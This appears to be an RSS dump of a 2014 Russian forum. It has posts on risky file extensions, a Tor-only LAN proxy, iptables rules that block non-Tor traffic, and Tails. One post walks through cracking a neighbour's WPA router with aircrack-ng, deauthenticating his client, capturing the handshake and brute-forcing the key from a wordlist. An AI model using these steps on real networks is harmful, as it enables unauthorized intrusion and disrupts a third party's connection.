нежелательные или вредоносные данные.</p> <p><span style="font-size: 20px">Офисные макросы</span></p> <p>&#160; &#160; .DOC, .XLS, .PPT – документы Microsoft Word, Excel, PowerPoint. Они могут содержать вредоносный программный код макроса.<br />&#160; &#160; .DOCM, .DOTM, .XLSM, .XLTM, .XLAM, .PPTM, .POTM, .PPAM, .PPSM, .SLDM - новые расширения офисных файлов, введенные в Office 2007. “M” в конце расширение указывает, что документ содержит макросы. Например, .DOCX файл не содержит макросов, в то время как файл .DOCM может содержать макросы.</p> <p><span style="font-size: 20px">И это все мне надо запомнить?</span></p> <p>Вообще желательно. Но можно распечатать и повесить на видном месте. Или сохранить ссылку и обращаться по мере необходимости. И не забудьте поделиться этой информацией со всеми своими бабушками, дедушками, девушками и другими начинающими пользователями, которые могут этого не знать.</p> mybb@mybb.ru (counter) Thu, 16 Oct 2014 21:50:19 +0400 https://antik.mybb.ru/viewtopic.php?pid=18#p18 https://antik.mybb.ru/viewtopic.php?pid=17#p17 <p><span style="font-size: 20px">На практике был использованы утилиты из дистрибутива Kali Linux</span></p> <p>Итак, картина маслом:</p> <p>74:DE:2B:77:19:4D - я.<br />18:F4:6A:9B:BF:59 - сосед.<br />C8:64:C7:53:02:0C - нужная нам точка доступа (роутер). <br />Роутер работает на 5 канале. Шифрование WPA/WPA2. Отображаемое имя DIR-300 <br /><br /></p> <p><span style="font-size: 20px">Запускаем беспроводной интерфейс в режиме мониторинга</span></p> <p>airmon-ng start wlan0</p> <p><span style="font-size: 20px">Слушаем (мониторим) эфир</span> </p> <p>Предварительная разведка<br />airodump-ng mon0<br />Останавливаем мониторинг клавишами Ctrl+C</p> <p>Слушаем пакеты только для конкретной точки доступа<br />airodump-ng --bssid C8:64:C7:53:02:0C mon0</p> <p>Начинаем запись (дампинг) пакетов в файлы packets*<br />airodump-ng -w packets -c 5 mon0</p> <p>Или лучше вести выборочную запись <br />airodump-ng --bssid C8:64:C7:53:02:0C -w packets -c 5 mon0<br />Здесь<br />--bssid C8:64:C7:53:02:0C точка доступа<br />-c 5 номер канала</p> <p><span style="font-size: 20px">Деаутентифицируем соседа</span></p> <p>Не останавливая записи пакетов, открываем новую консоль и создаём помехи соседу.<br />aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 --ignore-negative-one mon0</p> <p><span style="font-size: 20px">Подбираем PSK ключ по словарю</span></p> <p>Брутим полученные даные packets-01.cap с помощью словаря passwords.txt<br />aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets-01.cap</p> <p>Если было проведено несколько попыток записи, то можно анализировать группу файлов<br />aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets*.cap</p> <p>Здесь passwords.txt - текстовый файл, в каждой строке которого записан один пароль. Можно создать собственный словарь или скачать из Интернета.</p> mybb@mybb.ru (counter) Tue, 30 Sep 2014 15:11:24 +0400 https://antik.mybb.ru/viewtopic.php?pid=17#p17 https://antik.mybb.ru/viewtopic.php?pid=15#p15 <p>Наиболее изощренные любители запутанных соединений могут добавить в файл torrc параметр</p> <p>HTTPSProxy адрес:порт</p> <p>Такая настройка позволяет работать TOR-серверу через какой-нибудь прокси. Не знаю зачем, но возможно кому-то пригодится.</p> mybb@mybb.ru (counter) Sun, 24 Aug 2014 15:42:45 +0400 https://antik.mybb.ru/viewtopic.php?pid=15#p15 https://antik.mybb.ru/viewtopic.php?pid=7#p7 <p><span style="font-size: 20px">Эдвард Сноуден используeт Linux-дистрибутив Tails</span></p> <p>Эдвард Сноуден известный своими разоблачениям злодеяний ЦРУ и АНБ, дал интервью журналу Wired, из которого стало известно что Эдвард Сноуден использует специализированный Linux-дистрибутив Tails (The Amnesic Incognito Live System), что-бы обезопасить себя в Интернет пространстве от слежки со стороны его бывших сотрудников в АНБ. Дистрибутив Tails основан на системе Debian и работает как Live-дистрибутив, позволяющей обеспечить максимальный уровень анонимности и безопасности.</p> <p>Анонимность он-лайн обеспечивает ему сеть Tor, все исходящие и входящие соединения, кроме трафика через сеть Tor, по умолчанию блокируются файрволлом. Для хранения данных между запусками применяется шифрование с использованием TrueCrypt. Так же, в дистрибутиве есть защита данных от холодной перезагрузки (сохранение данных в оперативной памяти после выключения компьютера с последующим их восстановлением), при вытаскивании носителя (флешки или диска), вся оперативная память очищается.</p> <p>Кстати сам дистрибутив разрабатывается группой анонимных разработчиков, как и программа для шифрования TrueCrypt, как утверждают сами разработчики, они не раскрывают свои личности, дабы избежать давления со стороны спецслужб и чиновников, вспоминаем историю с Lavabit, который был закрыт по требованию властей.</p> <p>Официальная страница проекта: tails.boum.org</p> <p>Кстати я протестировал дистрибутив в условиях виртуальной машины. Впечатление самое приятное, никаких лагов или багов я не заметил, грузится быстро, работает стабильно. Советую попробовать всем, кто страдает параноей.</p> mybb@mybb.ru (counter) Sun, 17 Aug 2014 12:37:45 +0400 https://antik.mybb.ru/viewtopic.php?pid=7#p7 https://antik.mybb.ru/viewtopic.php?pid=6#p6 <p><span style="font-size: 20px">Рубим всё, что не TOR</span><br />Источник: <a href="http://habrahabr.ru/post/143516/" rel="nofollow" target="_blank">http://habrahabr.ru/post/143516/</a></p> <p>И теперь — самое вкусное: рубим доступ в сеть всему, что не TOR и не I2P. Ещё раз — всему.<br />Вот готовый скрипт iptables-restore, только проверьте ещё раз имена пользователей.</p> <p>nano /etc/iptables.up.rules</p> <p>Содержимое:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 13.5em"><pre>*filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT DROP [0:0] -A OUTPUT -d 127.0.0.1/32 -j ACCEPT -A OUTPUT -m owner --uid-owner debian-tor -j ACCEPT COMMIT</pre></div></div></div><p>Откроем файл настройки сети:<br />nano /etc/network/interfaces</p> <p>Допишем команду загрузки правил:<br />pre-up iptables-restore &lt; /etc/iptables.up.rules</p> <p>У меня выглядит так:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>auto lo iface lo inet loopback pre-up iptables-restore &lt; /etc/iptables.up.rules</pre></div></div></div><p>Поскольку управление сетью у меня идёт посредством network-manager — интерфейса eth0 в файле нет. Правила прописываются при поднятии лупбэка, но разницы нет, поскольку эти правила едины для всех интерфейсов.</p> <p>Загрузим правила в iptables. Можно перезапустить сеть, но мы сделаем так:<br />sudo iptables-restore &lt; /etc/iptables.up.rules</p> mybb@mybb.ru (counter) Sun, 17 Aug 2014 12:35:09 +0400 https://antik.mybb.ru/viewtopic.php?pid=6#p6 https://antik.mybb.ru/viewtopic.php?pid=2#p2 <p><span style="font-size: 20px">TOR-proxy для локальной сети. Настройка защищённого выхода в Интернет для локалки</span></p> <p>Сегодня рассмотрим простое решение, как организовать секьюрный выход в интернет из локальной сети. При такой организации сети вся работа с интернетом будет проходить только через TOR.</p> <p>Нам потребуется:<br />1. Компьютер с двумя сетевыми интерфейсами, который мы настроим как прокси-сервер.<br />2. Любой простейший роутер.</p> <p><img class="postimg" loading="lazy" src="https://sd.uploads.ru/zvTMj.png" alt="http://sd.uploads.ru/zvTMj.png" /></p> <p><span style="font-size: 20px">Настройка прокси-сервера</span></p> <p>Устанавливаем на серверный комп операционную систему Linux. Я в своих экспериментах использовал Debian 7. В принципе можно использовать и другие линуксы.</p> <p>Далее проводим настройку сервера с правами root.</p> <p>Открываем файл /etc/apt/sources.list например так:</p> <p>nano /etc/apt/sources.list</p> <p>и добавляем строку:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>deb http://deb.torproject.org/torproject.org wheezy main</pre></div></div></div><p>Получаем ключи, обновляем список ПО, установливаем Tor, Vidalia, Privoxy, для чего в терминале выполняем последовательно:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 9em"><pre>gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add - apt-get update apt-get install privoxy vidalia deb.torproject.org-keyring</pre></div></div></div><p>При установке пакета Vidalia будет задан вопрос какого пользователя добавить в группу debian-tor. Я обычно никого не добавляю.</p> <p>Удаляем текущий конфиг Privoxy:</p> <p>rm /etc/privoxy/config</p> <p>Создаем необходимый для работы с tor конфиг privoxy:</p> <p>nano /etc/privoxy/config</p> <p>вставляем:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 27em"><pre>forward-socks4a / 127.0.0.1:9050 . confdir /etc/privoxy logdir /var/log/privoxy actionsfile default.action actionsfile user.action filterfile default.filter logfile logfile debug 4096 debug 8192 user-manual /usr/share/doc/privoxy/user-manual listen-address 192.168.6.1:3128 toggle 1 enable-remote-toggle 0 enable-edit-actions 0 enable-remote-http-toggle 0 buffer-limit 4096</pre></div></div></div><p>Настраиваем систему для работы с TOR-прокси</p> <p>nano /etc/apt/apt.conf</p> <p>добавляем:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>Acquire::http::proxy &quot;http://192.168.6.1:3128/&quot;; Acquire::https::proxy &quot;https://192.168.6.1:3128/&quot;; Acquire::ftp::proxy &quot;ftp://192.168.6.1:3128/&quot;;</pre></div></div></div><p>nano /etc/environment</p> <p>добавляем:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>http_proxy=&quot;http://192.168.6.1:3128/&quot; https_proxy=&quot;https://192.168.6.1:3128/&quot; ftp_proxy=&quot;ftp://192.168.6.1:3128/&quot;</pre></div></div></div><p>Рубим всё, что не TOR.</p> <p>nano /etc/iptables.up.rules</p> <p>Содержимое:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 15em"><pre>*filter :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT DROP [0:0] -A OUTPUT -d 127.0.0.1/32 -j ACCEPT -A OUTPUT -d 192.168.6.1/24 -j ACCEPT -A OUTPUT -m owner --uid-owner debian-tor -j ACCEPT COMMIT</pre></div></div></div><p>Откроем файл настройки сети:<br />nano /etc/network/interfaces</p> <p>Допишем команду загрузки правил:<br />pre-up iptables-restore &lt; /etc/iptables.up.rules</p> <p>У меня выглядит так:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 21em"><pre>auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp #hwaddress ether 77:88:99:aa:bb:cc auto eth1 iface eth1 inet static address 192.168.6.1 netmask 255.255.255.0 pre-up iptables-restore &lt; /etc/iptables.up.rules</pre></div></div></div><p>Можно перезагрузить сервер</p> <p>reboot</p> <p><span style="font-size: 20px">Настройка роутера</span></p> <p>В настройках роутера указываем внешний IP 192.168.6.2</p> <p><span style="font-size: 20px">Настройка компьютеров локальной сети</span></p> <p>Выход в интернет компьютеры локальной сети имеют через прокси 192.168.6.1:3128. Именно такие адрес 192.168.6.1 и порт 3128 нужно указать в настройках прокси.</p> mybb@mybb.ru (counter) Sun, 17 Aug 2014 12:31:35 +0400 https://antik.mybb.ru/viewtopic.php?pid=2#p2